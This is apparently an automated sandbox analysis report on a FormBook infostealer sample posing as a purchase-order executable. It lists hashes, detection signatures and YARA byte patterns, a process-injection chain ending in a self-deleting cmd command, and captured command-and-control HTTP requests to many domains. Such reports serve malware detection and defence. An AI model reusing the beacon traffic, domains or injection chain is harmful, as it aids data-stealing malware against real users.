Loading ...

Play interactive tourEdit tour

Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Sample Name:Purchase Order 40,7045$.exe
Analysis ID:321097
MD5:4142c1713da2f4f94bec71bfed46587b
SHA1:06cc7bd53758a0936f4b674847411a4f912fd654
SHA256:fd94ea05d07271de517e92af291ec6a8cff49cc83bb59f112efb6d5fec56809c
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Purchase Order 40,7045$.exe (PID: 5468 cmdline: 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: 4142C1713DA2F4F94BEC71BFED46587B)
    • Purchase Order 40,7045$.exe (PID: 4392 cmdline: C:\Users\user\Desktop\Purchase Order 40,7045$.exe MD5: 4142C1713DA2F4F94BEC71BFED46587B)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • ipconfig.exe (PID: 6420 cmdline: C:\Windows\SysWOW64\ipconfig.exe MD5: B0C7423D02A007461C850CD0DFE09318)
          • cmd.exe (PID: 6524 cmdline: /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16089:$sqlite3step: 68 34 1C 7B E1
    • 0x1619c:$sqlite3step: 68 34 1C 7B E1
    • 0x160b8:$sqlite3text: 68 38 2A 90 C5
    • 0x161dd:$sqlite3text: 68 38 2A 90 C5
    • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
    00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 13 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x83d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8772:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14085:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13b71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14187:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x142ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x917a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x12dec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9ef2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19167:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a1da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16089:$sqlite3step: 68 34 1C 7B E1
        • 0x1619c:$sqlite3step: 68 34 1C 7B E1
        • 0x160b8:$sqlite3text: 68 38 2A 90 C5
        • 0x161dd:$sqlite3text: 68 38 2A 90 C5
        • 0x160cb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x161f3:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Purchase Order 40,7045$.exe.13a0000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.Purchase Order 40,7045$.exe.13a0000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x75d8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13285:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x12d71:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13387:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x134ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x837a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11fec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x90f2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18367:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x193da:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: Purchase Order 40,7045$.exeAvira: detected
          Multi AV Scanner detection for submitted fileShow sources
          Source: Purchase Order 40,7045$.exeVirustotal: Detection: 43%Perma Link
          Source: Purchase Order 40,7045$.exeReversingLabs: Detection: 36%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: Purchase Order 40,7045$.exeJoe Sandbox ML: detected
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 4x nop then pop edi1_2_00415044
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 4x nop then pop edi1_2_00415C88
          Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exeCode function: 4x nop then pop ebx1_2_004066DA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi5_2_02B15044
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop ebx5_2_02B066DA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 4x nop then pop edi5_2_02B15C88

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49763
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1Host: www.maninhatphoto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1Host: www.fahufu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1Host: www.the-gongs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.shopnicknaks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1Host: www.realitytvstockwatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.searchnehomes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1Host: www.happinestbuilders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1Host: www.hemparcade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewIP Address: 185.201.11.126 185.201.11.126
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
          Source: Joe Sandbox ViewASN Name: AS-HOSTINGERLT AS-HOSTINGERLT
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1Host: www.maninhatphoto.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1Host: www.placeduconfort.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1Host: www.heartandcrowncloset.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1Host: www.fahufu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1Host: www.the-gongs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.shopnicknaks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1Host: www.sweetbasilmarketing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1Host: www.justsoldbykristen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1Host: www.ariasu-nakanokaikei.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1Host: www.realitytvstockwatch.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1Host: www.searchnehomes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1Host: www.happinestbuilders.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1Host: www.hemparcade.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.handsfreedocs.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 10:07:21 GMTContent-Type: text/htmlContent-Length: 153Connection: closeServer: nginx/1.16.1Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000002.517836476.0000000006845000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: http://www.hemparcade.com
          Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: http://www.hemparcade.com/
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: http://yuyabo.com/

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
